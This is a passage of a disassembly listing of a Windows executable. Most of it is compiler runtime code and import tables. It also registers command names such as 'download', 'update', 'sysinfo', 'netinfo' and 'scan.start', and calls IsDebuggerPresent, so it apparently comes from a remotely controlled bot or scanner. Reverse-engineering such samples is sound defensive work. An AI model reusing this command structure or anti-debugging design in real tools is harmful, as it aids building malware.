call ds:dword_41D244 ; WSACleanup
jmp loc_41BC10
; ---------------------------------------------------------------------------
loc_41C061: ; CODE XREF: .text:0041BC30�j
; .text:0041BC3E�j
push offset byte_41EF17
call sub_419477 ; IsDebuggerPresent
; ---------------------------------------------------------------------------
db 5 dup(0CCh)
; [000000AA BYTES: COLLAPSED FUNCTION __alldiv. PRESS KEYPAD "+" TO EXPAND]
align 10h
__ftol2_sse:
cmp dword_433C7C, 0
jz short __ftol2
; [00000013 BYTES: COLLAPSED FUNCTION __ftol2_pentium4. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
__ftol2_sse_excpt:
cmp dword_433C7C, 0
jz short __ftol2
sub esp, 4
fnstcw word ptr [esp]
pop eax
and ax, 7Fh
cmp ax, 7Fh
jz short __ftol2_pentium4
; [00000075 BYTES: COLLAPSED FUNCTION __ftol2. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
lea ecx, [ebp-28h]
jmp loc_401137
; ---------------------------------------------------------------------------
loc_41C1D3: ; DATA XREF: sub_40267A+2�o
; sub_4026B9+2�o
mov edx, [esp+8]
lea eax, [edx+0Ch]
mov ecx, [edx-54h]
xor ecx, eax
call sub_402710
mov eax, offset dword_4212B8
jmp ___CxxFrameHandler3
; ---------------------------------------------------------------------------
__ehhandler$?CallUnexpected@@YAXPBU_s_ESTypeList@@@Z: ; DATA XREF: unknown_libname_101+2�o
mov edx, [esp+8]
lea eax, [edx+0Ch]
mov ecx, [edx-14h]
xor ecx, eax
call sub_402710
mov eax, offset dword_421658
jmp ___CxxFrameHandler3
; =============== S U B R O U T I N E =======================================
sub_41C209 proc near ; CODE XREF: __callnewh+14�p
; DATA XREF: unknown_libname_2+2�o
arg_4 = dword ptr 8
mov edx, [esp+arg_4]
lea eax, [edx+0Ch]
mov ecx, [edx-1Ch]
xor ecx, eax
call sub_402710
mov eax, offset dword_421AB8
jmp ___CxxFrameHandler3
sub_41C209 endp
; ---------------------------------------------------------------------------
mov ecx, [ebp-10h]
jmp sub_402CCA
; ---------------------------------------------------------------------------
__ehhandler$?CallUnexpected@@YAXPBU_s_ESTypeList@@@Z_0: ; DATA XREF: sub_401065+2�o
; sub_4013E6+2�o
mov edx, [esp+8]
lea eax, [edx+0Ch]
mov ecx, [edx-14h]
xor ecx, eax
call sub_402710
mov eax, offset dword_421AE8
jmp ___CxxFrameHandler3
; ---------------------------------------------------------------------------
lea ecx, [ebp-2Ch]
jmp loc_401137
; ---------------------------------------------------------------------------
loc_41C24F: ; DATA XREF: sub_4016BA+2�o
mov edx, [esp+8]
lea eax, [edx+0Ch]
mov ecx, [edx-58h]
xor ecx, eax
call sub_402710
mov eax, offset dword_421B18
jmp ___CxxFrameHandler3
; ---------------------------------------------------------------------------
__unwindfunclet$?empty@locale@std@@SA?AV12@XZ$0:
push dword ptr [ebp-10h]
call j__free
pop ecx
retn
; ---------------------------------------------------------------------------
__ehhandler$?empty@locale@std@@SA?AV12@XZ: ; DATA XREF: sub_41B775+2�o
mov edx, [esp+8]
lea eax, [edx+0Ch]
mov ecx, [edx-14h]
xor ecx, eax
call sub_402710
mov eax, offset dword_421A00
jmp ___CxxFrameHandler3
; ---------------------------------------------------------------------------
__unwindfunclet$?empty@locale@std@@SA?AV12@XZ$0_0:
push dword ptr [ebp-10h]
call j__free
pop ecx
retn
; ---------------------------------------------------------------------------
__ehhandler$?empty@locale@std@@SA?AV12@XZ_0: ; DATA XREF: sub_418D17+2�o
mov edx, [esp+8]
lea eax, [edx+0Ch]
mov ecx, [edx-14h]
xor ecx, eax
call sub_402710
mov eax, offset dword_421A2C
jmp ___CxxFrameHandler3
; ---------------------------------------------------------------------------
lea ecx, [ebp-28h]
jmp loc_401137
; ---------------------------------------------------------------------------
loc_41C2BC: ; DATA XREF: sub_40121E+2�o
mov edx, [esp+8]
lea eax, [edx+0Ch]
mov ecx, [edx-54h]
xor ecx, eax
call sub_402710
mov eax, offset dword_421B48
jmp ___CxxFrameHandler3
; ---------------------------------------------------------------------------
push dword ptr [ebp-58h]
call j__free
pop ecx
retn
; ---------------------------------------------------------------------------
loc_41C2E1: ; DATA XREF: sub_401F1C+2�o
mov edx, [esp+8]
lea eax, [edx+0Ch]
mov ecx, [edx-70h]
xor ecx, eax
call sub_402710
mov ecx, [edx-4]
xor ecx, eax
call sub_402710
mov eax, offset dword_421B78
jmp ___CxxFrameHandler3
; ---------------------------------------------------------------------------
push dword ptr [ebp-4BCh]
call j__free
pop ecx
retn
; ---------------------------------------------------------------------------
loc_41C313: ; DATA XREF: sub_4019F3+5�o
mov edx, [esp+8]
lea eax, [edx+0Ch]
mov ecx, [edx-4C8h]
xor ecx, eax
call sub_402710
mov ecx, [edx-4]
xor ecx, eax
call sub_402710
mov eax, offset dword_421BA8
jmp ___CxxFrameHandler3
; ---------------------------------------------------------------------------
push dword ptr [ebp-4C0h]
call j__free
pop ecx
retn
; ---------------------------------------------------------------------------
loc_41C348: ; DATA XREF: sub_40177B+5�o
mov edx, [esp+8]
lea eax, [edx+0Ch]
mov ecx, [edx-4C8h]
xor ecx, eax
call sub_402710
mov ecx, [edx-4]
xor ecx, eax
call sub_402710
mov eax, offset dword_421BD8
jmp ___CxxFrameHandler3
; =============== S U B R O U T I N E =======================================
sub_41C370 proc near ; DATA XREF: .rdata:0041D28C�o
call sub_401291
and dword_433C44, 0
push offset loc_41C498 ; void (__cdecl *)()
mov dword_433C40, eax
call _atexit
pop ecx
retn
; ---------------------------------------------------------------------------
loc_41C38D: ; DATA XREF: .rdata:0041D290�o
call sub_40172D
and dword_433C50, 0
push offset sub_41C4E1 ; void (__cdecl *)()
mov dword_433C4C, eax
call _atexit
pop ecx
retn
; ---------------------------------------------------------------------------
loc_41C3AA: ; DATA XREF: .rdata:0041D294�o
push esi
push offset aDownload ; "download"
mov esi, offset off_433C58
call sub_41BB84
mov off_433C58, offset off_420AE4
pop esi
retn
; ---------------------------------------------------------------------------
loc_41C3C6: ; DATA XREF: .rdata:0041D298�o
push esi
push offset aUpdate ; "update"
mov esi, offset off_433C54
call sub_41BB84
mov off_433C54, offset off_420AEC
pop esi
retn
; ---------------------------------------------------------------------------
loc_41C3E2: ; DATA XREF: .rdata:0041D29C�o
push esi
push offset aHttp ; "http"
mov esi, offset off_433C5C
call sub_41BB84
mov off_433C5C, offset off_420B04
pop esi
retn
; ---------------------------------------------------------------------------
loc_41C3FE: ; DATA XREF: .rdata:0041D2A0�o
push esi
push offset aSysinfo ; "sysinfo"
mov esi, offset off_433C60
call sub_41BB84
mov off_433C60, offset off_420BC4
pop esi
retn
; ---------------------------------------------------------------------------
loc_41C41A: ; DATA XREF: .rdata:0041D2A4�o
push esi
push offset aNetinfo ; "netinfo"
mov esi, offset off_433C64
call sub_41BB84
mov off_433C64, offset off_420BCC
pop esi
retn
; ---------------------------------------------------------------------------
loc_41C436: ; DATA XREF: .rdata:0041D2A8�o
mov eax, dword_424644
add eax, 6
mov dword_433C68, eax
retn
; ---------------------------------------------------------------------------
loc_41C444: ; DATA XREF: .rdata:0041D2AC�o
push esi
push offset aScan_start ; "scan.start"
mov esi, offset off_433C74
call sub_41BB84
mov off_433C74, offset off_420D1C
pop esi
retn
; ---------------------------------------------------------------------------
loc_41C460: ; DATA XREF: .rdata:0041D2B0�o
push esi
push offset aScan_stop ; "scan.stop"
mov esi, offset off_433C6C
call sub_41BB84
mov off_433C6C, offset off_420D24
pop esi
retn
; ---------------------------------------------------------------------------
loc_41C47C: ; DATA XREF: .rdata:0041D2B4�o
push esi
push offset aScan_stats ; "scan.stats"
mov esi, offset off_433C70
call sub_41BB84
mov off_433C70, offset off_420D2C
pop esi
retn
; ---------------------------------------------------------------------------
; void __cdecl loc_41C498()
loc_41C498: ; DATA XREF: sub_41C370+C�o
mov eax, dword_433C40
mov ecx, [eax]
mov [eax], eax
mov eax, dword_433C40
mov [eax+4], eax
and dword_433C44, 0
cmp ecx, dword_433C40
jz short loc_41C4CD
push esi
loc_41C4B9: ; CODE XREF: sub_41C370+15A�j
mov esi, [ecx]
push ecx ; Memory
call j__free
cmp esi, dword_433C40
pop ecx
mov ecx, esi
jnz short loc_41C4B9
pop esi
loc_41C4CD: ; CODE XREF: sub_41C370+146�j
push dword_433C40 ; Memory
call j__free
and dword_433C40, 0
pop ecx
retn
sub_41C370 endp
; =============== S U B R O U T I N E =======================================
; void __cdecl sub_41C4E1()
sub_41C4E1 proc near ; DATA XREF: sub_41C370+29�o
mov eax, dword_433C4C
mov ecx, [eax]
mov [eax], eax
mov eax, dword_433C4C
mov [eax+4], eax
and dword_433C50, 0
cmp ecx, dword_433C4C
jz short loc_41C516
push esi
loc_41C502: ; CODE XREF: sub_41C4E1+32�j
mov esi, [ecx]
push ecx ; Memory
call j__free
cmp esi, dword_433C4C
pop ecx
mov ecx, esi
jnz short loc_41C502
pop esi
loc_41C516: ; CODE XREF: sub_41C4E1+1E�j
push dword_433C4C ; Memory
call j__free
and dword_433C4C, 0
pop ecx
retn
sub_41C4E1 endp
; =============== S U B R O U T I N E =======================================
; void __cdecl sub_41C52A()
sub_41C52A proc near ; DATA XREF: operator new(uint)+40�o
mov dword_425A84, offset off_41D314
mov ecx, offset dword_425A84
jmp sub_402CCA
sub_41C52A endp
_text ends
; Section 2. (virtual address 0001D000)
; Virtual size : 00005852 ( 22610.)
; Section size in file : 00005852 ( 22610.)
; Offset to raw data for section: 0001D000
; Flags 40000040: Data Readable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read
_rdata segment para public 'DATA' use32
assume cs:_rdata
;org 41D000h
dword_41D000 dd 77DD5C55h ; DATA XREF: sub_416F32+39�r
dword_41D004 dd 77DD590Bh ; DATA XREF: sub_416E5F+1D�r
; sub_416F32+1B�r
dword_41D008 dd 77DD23D7h ; DATA XREF: sub_416ECD+31�r
dword_41D00C dd 77DD59F0h ; DATA XREF: sub_416E5F+52�r
dword_41D010 dd 77DD189Ah ; DATA XREF: sub_416E5F+2A�r
; sub_416E5F+60�r ...
dword_41D014 dd 77DDA595h ; DATA XREF: sub_419835+3C�r
dword_41D018 dd 77DD81E3h ; DATA XREF: sub_419C6D+A5�r
; sub_419C6D+1B6�r
dword_41D01C dd 77DE1291h ; DATA XREF: sub_419760+82�r
dword_41D020 dd 77DD7F3Eh ; DATA XREF: sub_419A9F+132�r
dword_41D024 dd 77DDA20Bh ; DATA XREF: sub_419C1D+C�r
dword_41D028 dd 77E2B9D2h ; DATA XREF: sub_419760+24�r
dword_41D02C dd 77DD22EAh ; DATA XREF: sub_416ECD+14�r
; sub_419A9F+90�r ...
dword_41D030 dd 77DE7B47h ; DATA XREF: sub_419EA0+299�r
dword_41D034 dd 77DF7311h ; DATA XREF: sub_419835+19�r
dword_41D038 dd 77DD5CF6h ; DATA XREF: sub_419EA0+27D�r
dword_41D03C dd 77E2C1B3h ; DATA XREF: sub_419C1D+2E�r
dword_41D040 dd 77DDAB2Fh ; DATA XREF: sub_419C1D+3B�r
dword_41D044 dd 77DE801Bh ; DATA XREF: sub_419C1D+1E�r
dword_41D048 dd 77DDACABh ; DATA XREF: sub_401CC0+110�r
align 10h
dword_41D050 dd 77E75CB5h ; DATA XREF: ___crtExitProcess+E�r
; sub_419477+168�r ...
dword_41D054 dd 77E7513Ch ; DATA XREF: ___ansicp+22�r
; sub_418E1F+29�r
dword_41D058 dd 77E802FCh ; DATA XREF: ___security_init_cookie+5D�r
; sub_418DA0+B�r
dword_41D05C dd 77E61BB8h ; DATA XREF: sub_419219+8B�r
dword_41D060 dd 77E7A099h ; DATA XREF: __NMSG_WRITE+99�r
; __setargv+2A�r ...
dword_41D064 dd 77E6D75Bh ; DATA XREF: sub_418DA0+19�r
dword_41D068 dd 77E7C657h ; DATA XREF: ___tmainCRTStartup+4E�r
; sub_418E51+24�r ...
dword_41D06C dd 77E7A837h ; DATA XREF: __tsopen_nolock+234�r
; ___initconout+13�r ...
dword_41D070 dd 77E793EFh ; DATA XREF: sub_418552+31E�r
dword_41D074 dd 77E78C81h ; DATA XREF: __lseeki64_nolock+40�r
; __lseek_nolock+2D�r ...
dword_41D078 dd 77E78B82h ; DATA XREF: __read_nolock+17F�r
; __read_nolock+2A3�r ...
dword_41D07C dd 77E79D5Bh ; DATA XREF: sub_4140AB+5E�r
; sub_41A9DE+6CD�r ...
dword_41D080 dd 77E6BD13h ; DATA XREF: .text:0041BD99�r
dword_41D084 dd 77E7C2C4h ; DATA XREF: .text:0041BED8�r
dword_41D088 dd 77E79D8Ch ; DATA XREF: __NMSG_WRITE+194�r
; __write_nolock+212�r ...
dword_41D08C dd 77E73C49h ; DATA XREF: sub_41B3D0+20�r
; sub_41B5D2+43�r
dword_41D090 dd 77E72E92h ; DATA XREF: __invoke_watson+AA�r
; ___report_gsfailure+B9�r ...
dword_41D094 dd 77E75CEBh ; DATA XREF: sub_414023+8�r
dword_41D098 dd 77E76C1Ah ; DATA XREF: sub_401CC0+B3�r
dword_41D09C dd 77E737DEh ; DATA XREF: sub_41A9DE+63F�r
dword_41D0A0 dd 77E77CCEh ; DATA XREF: __read_nolock+3E7�r
; unknown_libname_111:loc_40C004�r ...
dword_41D0A4 dd 77E74672h ; DATA XREF: sub_41A5C1+2C3�r
dword_41D0A8 dd 77E70192h ; DATA XREF: __chsize_nolock+14C�r
dword_41D0AC dd 77E76052h ; DATA XREF: __putwch_nolock+45�r
dword_41D0B0 dd 77E795BFh ; DATA XREF: __putwch_nolock+78�r
dword_41D0B4 dd 77E99078h ; DATA XREF: __putwch_nolock+9B�r
dword_41D0B8 dd 77E73FF9h ; DATA XREF: __commit+8C�r
dword_41D0BC dd 77E7FF2Eh ; DATA XREF: __set_osfhnd:loc_40ECD3�r
; __free_osfhnd:loc_40ED54�r
dword_41D0C0 dd 77E79824h ; DATA XREF: sub_4195EC+39�r
dword_41D0C4 dd 77E7C4B7h ; DATA XREF: sub_4195EC+50�r
dword_41D0C8 dd 77E79E4Bh ; DATA XREF: sub_4195EC+6F�r
dword_41D0CC dd 77E79C90h ; DATA XREF: __invoke_watson+D9�r
; ___report_gsfailure+F5�r ...
dword_41D0D0 dd 77E73628h ; DATA XREF: sub_419E55+20�r
; .text:0041BE71�r
dword_41D0D4 dd 77E6E154h ; DATA XREF: sub_419948+3B�r
dword_41D0D8 dd 77E98BD8h ; DATA XREF: sub_4199AC+3B�r
dword_41D0DC dd 77E77963h ; DATA XREF: __close_nolock+4B�r
; __tsopen_nolock+29C�r ...
dword_41D0E0 dd 77E77CC4h ; DATA XREF: __getptd_noexit+60�r
; __mtinit+169�r ...
dword_41D0E4 dd 77E79F93h ; DATA XREF: __encode_pointer+39�r
; __decode_pointer+39�r ...
dword_41D0E8 dd 77E805D8h ; DATA XREF: sub_40F524+2D�r
; sub_419677+30�r ...
dword_41D0EC dd 77E7A5FDh ; DATA XREF: __encode_pointer+49�r
; __decode_pointer+49�r ...
dword_41D0F0 dd 77F5157Dh ; DATA XREF: _free+79�r
; __getptd_noexit+2�r ...
dword_41D0F4 dd 77E704FCh ; DATA XREF: sub_401CC0+11F�r
; sub_416F86+D1�r ...
dword_41D0F8 dd 77E616B4h ; DATA XREF: __invoke_watson+E0�r
; ___report_gsfailure+FC�r ...
dword_41D0FC dd 77E61BE6h ; DATA XREF: unknown_libname_53+1D�r
; unknown_libname_55+25�r ...
dword_41D100 dd 77E77CB7h ; DATA XREF: ___tmainCRTStartup+29�r
; __chsize_nolock+67�r ...
dword_41D104 dd 77E73163h ; DATA XREF: sub_419EA0:loc_41A108�r
dword_41D108 dd 77E7751Ah ; DATA XREF: ___security_init_cookie+51�r
; sub_41748B+36�r ...
dword_41D10C dd 77F51597h ; DATA XREF: _free+68�r
; ___tmainCRTStartup+5E�r ...
dword_41D110 dd 77E7AC37h ; DATA XREF: sub_4140AB+1C�r
; sub_41B5D2+161�r
dword_41D114 dd 77F516F8h ; DATA XREF: _malloc+F�r
; ___tmainCRTStartup+32�r ...
dword_41D118 dd 77E79540h ; DATA XREF: __write_nolock+11D�r
dword_41D11C dd 77EC80CCh ; DATA XREF: __write_nolock:loc_40CF93�r
dword_41D120 dd 77E79908h ; DATA XREF: __crtInitCritSecNoSpinCount(x,x)+4�r
dword_41D124 dd 77E7C866h ; DATA XREF: __crtGetStringTypeA_stat(localeinfo_struct *,ulong,char const *,int,ushort *,int,int,int)+2D�r
; __crtGetStringTypeA_stat(localeinfo_struct *,ulong,char const *,int,ushort *,int,int,int)+11C�r
dword_41D128 dd 77E641EBh ; DATA XREF: __crtGetStringTypeA_stat(localeinfo_struct *,ulong,char const *,int,ushort *,int,int,int)+191�r
dword_41D12C dd 77E781F9h ; DATA XREF: unknown_libname_111+30�r
; unknown_libname_111+144�r ...
dword_41D130 dd 77E77405h ; DATA XREF: unknown_libname_111+294�r
; unknown_libname_111+365�r
dword_41D134 dd 77E77EE1h ; DATA XREF: ___crtGetEnvironmentStringsA+B�r
dword_41D138 dd 77E79924h ; DATA XREF: ___crtGetEnvironmentStringsA:loc_40AF87�r
; unknown_libname_111+216�r ...
dword_41D13C dd 77E7C9E1h ; DATA XREF: ___crtGetEnvironmentStringsA+CC�r
dword_41D140 dd 77E67702h ; DATA XREF: ___crtGetEnvironmentStringsA:loc_40AFEB�r
dword_41D144 dd 77E9C5B1h ; DATA XREF: ___crtGetEnvironmentStringsA+10F�r
; ___crtGetEnvironmentStringsA+126�r
dword_41D148 dd 77E78406h ; DATA XREF: __ioinit+12B�r
; __ioinit+1C7�r ...
dword_41D14C dd 77E79C3Dh ; DATA XREF: __ioinit+1B5�r
; __NMSG_WRITE+169�r
dword_41D150 dd 77E7C931h ; DATA XREF: __ioinit+21F�r
dword_41D154 dd 77F5722Fh ; DATA XREF: ___sbh_alloc_new_region+27�r
; _realloc+134�r ...
dword_41D158 dd 77E7980Ah ; DATA XREF: ___sbh_alloc_new_region+77�r
; ___sbh_alloc_new_group+52�r
dword_41D15C dd 77E79E34h ; DATA XREF: ___sbh_free_block+22F�r
dword_41D160 dd 77E7C726h ; DATA XREF: __heap_init+11�r
dword_41D164 dd 77E76E0Bh ; DATA XREF: __heap_init+47�r
dword_41D168 dd 77F7E21Fh ; DATA XREF: __lock+28�r
; __lock_file+28�r ...
dword_41D16C dd 77F7E300h ; DATA XREF: __unlock+D�r
; __unlock_file+28�r ...
dword_41D170 dd 77F53275h ; DATA XREF: __mtdeletelocks+1�r
; __fcloseall+62�r
dword_41D174 dd 77F51587h ; DATA XREF: __getptd_noexit+78�r
; ___crtInitCritSecAndSpinCount+AB�r
dword_41D178 dd 77E72B29h ; DATA XREF: __mtterm+2B�r __mtinit+85�r
dword_41D17C dd 77E79B39h ; DATA XREF: ___set_flsgetvalue+23�r
; __mtinit+58�r
dword_41D180 dd 77E7C5B4h ; DATA XREF: sub_4051F6�r
; __mtinit:loc_405575�r
dword_41D184 dd 77E78B61h ; DATA XREF: __encode_pointer+7�r
; __decode_pointer+7�r ...
dword_41D188 dd 77E6C703h ; DATA XREF: getSystemCP(int)+27�r
dword_41D18C dd 77E7A13Fh ; DATA XREF: getSystemCP(int)+4A�r
dword_41D190 dd 77F522F2h ; DATA XREF: __msize+82�r
dword_41D194 dd 77E80656h ; DATA XREF: sub_402AE8�r
; ___security_init_cookie+41�r
dword_41D198 dd 77EB9A84h ; DATA XREF: __invoke_watson+BE�r
; ___report_gsfailure+D9�r ...
dword_41D19C dd 77E7C9E7h ; DATA XREF: __invoke_watson+B4�r
; ___report_gsfailure+CE�r ...
dword_41D1A0 dd 77E6167Bh ; DATA XREF: __time64+9�r
; ___security_init_cookie+35�r
dword_41D1A4 dd 77E7C938h ; DATA XREF: ___tmainCRTStartup:loc_404045�r
dword_41D1A8 dd 77E6177Ah ; DATA XREF: ___tmainCRTStartup+14�r
; __ioinit+15�r
dword_41D1AC dd 77E6D706h ; DATA XREF: __raise_exc_ex+222�r
dword_41D1B0 dd 77F6183Eh ; DATA XREF: sub_413976�r
dword_41D1B4 dd 77E7849Fh ; DATA XREF: setSBUpLow(threadmbcinfostruct *)+24�r
; __setmbcp_nolock+56�r ...
dword_41D1B8 dd 77E777EFh ; DATA XREF: ___updatetmbcinfo+84�r
; __setmbcp+95�r ...
dword_41D1BC dd 77E778C5h ; DATA XREF: ___updatetmbcinfo+59�r
; __setmbcp+76�r ...
dd 0
dword_41D1C4 dd 71B2ACCBh ; DATA XREF: sub_402642�r
dd 0
dword_41D1CC dd 1F7CD927h ; DATA XREF: sub_40263C�r
dword_41D1D0 dd 1F7CB8F8h ; DATA XREF: sub_402636�r
dword_41D1D4 dd 1F7CD214h ; DATA XREF: sub_402630�r
dword_41D1D8 dd 1F7D886Ah ; DATA XREF: sub_40262A�r
dword_41D1DC dd 1F7BA3A9h ; DATA XREF: sub_402624�r
dd 0
dword_41D1E4 dd 77428B97h ; DATA XREF: sub_4190BD+148�r
; sub_41B925+1E3�r
dd 0
dword_41D1EC dd 77D46349h ; DATA XREF: sub_41748B+30�r
dword_41D1F0 dd 77D4DCCCh ; DATA XREF: sub_418C40+67�r
dword_41D1F4 dd 77D4A102h ; DATA XREF: sub_418C40+C�r
dword_41D1F8 dd 77D43DD3h ; DATA XREF: sub_418C40+B1�r
dword_41D1FC dd 77D414D4h ; DATA XREF: sub_418C40+94�r
dword_41D200 dd 77D46F5Bh ; DATA XREF: sub_418AEB+D�r
dword_41D204 dd 77D441F2h ; DATA XREF: sub_418C40+BB�r
dword_41D208 dd 77D44200h ; DATA XREF: sub_418C40+A5�r
dword_41D20C dd 77D47EE5h ; DATA XREF: sub_418C40+4A�r
dd 0
dword_41D214 dd 7620BD61h ; DATA XREF: sub_41B925+EB�r
dword_41D218 dd 76214750h ; DATA XREF: sub_41B925+7D�r
dword_41D21C dd 7620AFB6h ; DATA XREF: sub_41B925+39�r
dd 0
dword_41D224 dd 71AB1A6Dh ; DATA XREF: sub_41397C+98�r
; sub_417F01+117�r ...
dword_41D228 dd 71AB1AF4h ; DATA XREF: sub_4172CC+7D�r
; sub_417361+116�r ...
dword_41D22C dd 71AB60C9h ; DATA XREF: sub_418B1F+FA�r
dword_41D230 dd 71AB5DE2h ; DATA XREF: sub_418B1F+10C�r
dword_41D234 dd 71AB868Dh ; DATA XREF: sub_41835D+1A�r
dword_41D238 dd 71AB157Eh ; DATA XREF: sub_418FC6+34�r
dword_41D23C dd 71AB2BBFh ; DATA XREF: sub_41802F+7B�r
dword_41D240 dd 71AB3E5Dh ; DATA XREF: sub_41397C+78�r
; sub_41802F+DF�r ...
dword_41D244 dd 71AB1836h ; DATA XREF: .text:loc_41C056�r
dword_41D248 dd 71ABF628h ; DATA XREF: sub_418552+4C9�r
dword_41D24C dd 71AB1ED3h ; DATA XREF: sub_41B3D0+F7�r
dword_41D250 dd 71AB3F8Dh ; DATA XREF: sub_41B5D2+58�r
dword_41D254 dd 71AB1746h ; DATA XREF: sub_41B3D0+131�r
; sub_41B3D0+147�r ...
dword_41D258 dd 71AB1890h ; DATA XREF: sub_41397C+8F�r
; sub_41B5D2+F4�r
dword_41D25C dd 71AB1444h ; DATA XREF: sub_41B3D0+11C�r
; sub_41B5D2+12C�r
dword_41D260 dd 71AB401Ch ; DATA XREF: sub_41A9DE+3C�r
; sub_41A9DE+76F�r ...
dword_41D264 dd 71AB12F8h ; DATA XREF: sub_401E82+37�r
dword_41D268 dd 71AB155Ah ; DATA XREF: sub_41397C+54�r
dword_41D26C dd 71AB3ECEh ; DATA XREF: sub_418B1F+D7�r
; sub_41B5D2+9E�r
dword_41D270 dd 71AB5690h ; DATA XREF: sub_417F01+51�r
; sub_418552+85�r
dword_41D274 dd 71AB41DAh ; DATA XREF: .text:0041BF9C�r
dword_41D278 dd 71AB1746h ; DATA XREF: sub_41397C+34�r
; sub_41802F+C7�r ...
dword_41D27C dd 71AB3C22h ; DATA XREF: sub_41397C+20�r
; sub_41802F+2F�r ...
dword_41D280 dd 71ABD755h ; DATA XREF: sub_401E82+48�r
; sub_418552+4F9�r
align 8
dword_41D288 dd 0 ; DATA XREF: __cinit+49�o
dd offset sub_41C370
dd offset loc_41C38D
dd offset loc_41C3AA
dd offset loc_41C3C6
dd offset loc_41C3E2
dd offset loc_41C3FE
dd offset loc_41C41A
dd offset loc_41C436
dd offset loc_41C444
dd offset loc_41C460
dd offset loc_41C47C
dword_41D2B8 dd 0 ; DATA XREF: __cinit+50�o
dword_41D2BC dd 0 ; DATA XREF: __cinit+2D�o
dd offset ___onexitinit
dd offset ___initmbctable
dd offset ___initstdio
dd offset __sse2_mathfcns_init
dd offset sub_40F839
dd offset $LN9_2 ; ?__CxxSetUnhandledExceptionFilter@@YAHXZ
dword_41D2D8 dd 0 ; DATA XREF: __cinit+28�o
dword_41D2DC dd 0 ; DATA XREF: _doexit+73�o
dd offset ___termcon
dd offset ___endstdio
dword_41D2E8 dd 0 ; DATA XREF: _doexit:loc_407A79�o
dword_41D2EC dd 0 ; DATA XREF: _doexit+83�o
dd offset ?__CxxRestoreUnhandledExceptionFilter@@YAXXZ ; __CxxRestoreUnhandledExceptionFilter(void)
dword_41D2F4 dd 3 dup(0) ; DATA XREF: _doexit:loc_407A89�o
aBadAllocation db 'bad allocation',0 ; DATA XREF: .data:00423000�o
; .data:00423004�o ...
align 10h
dd offset dword_420F64
off_41D314 dd offset sub_401043 ; DATA XREF: sub_401038�o sub_401043+3�o ...
dd offset unknown_libname_7 ; Microsoft VisualC 2-8/net runtime
dd offset dword_420F18
off_41D320 dd offset sub_4010C5 ; DATA XREF: sub_401065+20�o
; sub_40109A+A�o ...
dd offset unknown_libname_1 ; Microsoft VisualC 2-8/net runtime
dd offset dword_420EC8
off_41D32C dd offset sub_4010EC ; DATA XREF: sub_4010E1�o sub_4010EC+3�o ...
dd offset unknown_libname_1 ; Microsoft VisualC 2-8/net runtime
dd offset dword_420D88
off_41D338 dd offset sub_402658 ; DATA XREF: sub_40264D�o sub_402658+3�o ...
dd offset unknown_libname_1 ; Microsoft VisualC 2-8/net runtime
aStringTooLong db 'string too long',0 ; DATA XREF: sub_40267A+C�o
aInvalidStringP db 'invalid string position',0 ; DATA XREF: sub_4026B9+C�o
dd offset dword_420DD8
off_41D36C dd offset sub_402CED ; DATA XREF: sub_402BFB+A�o
; std::exception::exception(char const * const &)+9�o ...
dd offset unknown_libname_7 ; Microsoft VisualC 2-8/net runtime
aUnknownExcepti db 'Unknown exception',0 ; DATA XREF: unknown_libname_7+7�o
align 4
dd offset dword_420DEC
off_41D38C dd offset sub_402FFB ; DATA XREF: sub_402FED+1�o
; .data:off_423008�o ...
oword_41D390 xmmword 3FF00000000000003FF0000000000000h ; DATA XREF: _ceil+E3�r
; _ceil+10A�r
oword_41D3A0 xmmword 4330000000000000433h ; DATA XREF: _ceil+46�r
oword_41D3B0 xmmword 0 ; DATA XREF: _ceil:ret_one�r
oword_41D3C0 xmmword 7FFh ; DATA XREF: _ceil+5F�r
dbl_41D3D0 db 0, 0, 0, 0, 0, 0, 0, 80h ; DATA XREF: _ceil:ret_zero�r
dword_41D3D8 dd 0E06D7363h, 1, 2 dup(0) ; DATA XREF: sub_4041BB+E�o
dd 3, 19930520h, 2 dup(0)
off_41D3F8 dd offset dword_425AA0 ; DATA XREF: ___report_gsfailure+D4�o
dd offset dword_425AF8
dd 4030201h, 8070605h, 0C0B0A09h, 100F0E0Dh, 14131211h
dd 18171615h, 1C1B1A19h, 201F1E1Dh, 24232221h, 28272625h
dd 2C2B2A29h, 302F2E2Dh, 34333231h, 38373635h, 3C3B3A39h
dd 403F3E3Dh, 44434241h, 48474645h, 4C4B4A49h, 504F4E4Dh
dd 54535251h, 58575655h, 5C5B5A59h, 605F5E5Dh, 64636261h
dd 68676665h, 6C6B6A69h, 706F6E6Dh, 74737271h, 78777675h
dd 7C7B7A79h, 7F7E7Dh
byte_41D480 db 3Dh, 0 ; DATA XREF: .rdata:0041EB90�o
word_41D482 dw 0 ; DATA XREF: __wincmdln+1B�o
; .rdata:0041EB70�o ...
aEncodepointer db 'EncodePointer',0 ; DATA XREF: __encode_pointer+43�o
; __initptd+2E�o
align 4
aKernel32_dll db 'KERNEL32.DLL',0 ; DATA XREF: __encode_pointer:loc_40515B�o
; __decode_pointer:loc_4051C7�o ...
align 4
aDecodepointer db 'DecodePointer',0 ; DATA XREF: __decode_pointer+43�o
; __initptd+42�o
align 4
aFlsfree db 'FlsFree',0 ; DATA XREF: __mtinit+44�o
aFlssetvalue db 'FlsSetValue',0 ; DATA XREF: __mtinit+37�o
aFlsgetvalue db 'FlsGetValue',0 ; DATA XREF: __mtinit+2A�o
aFlsalloc db 'FlsAlloc',0 ; DATA XREF: __mtinit+22�o
align 10h
aNull_0: ; DATA XREF: .data:off_423928�o
unicode 0, <(null)>,0
align 10h
aNull db '(null)',0 ; DATA XREF: .data:Str�o
align 4
byte_41D4F8 db 6 ; DATA XREF: __output_l:loc_406B60�r
db 2 dup(0), 6
dd 100h, 6030010h, 10020600h, 45454504h, 5050505h, 303505h
dd 50h, 38202800h, 8075850h, 30303700h, 75057h, 8202000h
dd 0
db 8,'`h````',0
dd 78707800h, 8787878h, 807h, 8080007h, 8000008h, 7000800h
dd 8
aCorexitprocess db 'CorExitProcess',0 ; DATA XREF: ___crtCorExitProcess+F�o
align 4
aMscoree_dll db 'mscoree.dll',0 ; DATA XREF: ___crtCorExitProcess�o
; char aCcs[]
aCcs db 'ccs=',0 ; DATA XREF: __openfile+1CC�o
align 4
; unsigned __int8 aUtf8
aUtf8 db 'UTF-8',0 ; DATA XREF: __openfile+1E0�o
align 10h
; unsigned __int8 aUtf16le
aUtf16le db 'UTF-16LE',0 ; DATA XREF: __openfile:loc_4083FC�o
align 4
; unsigned __int8 aUnicode
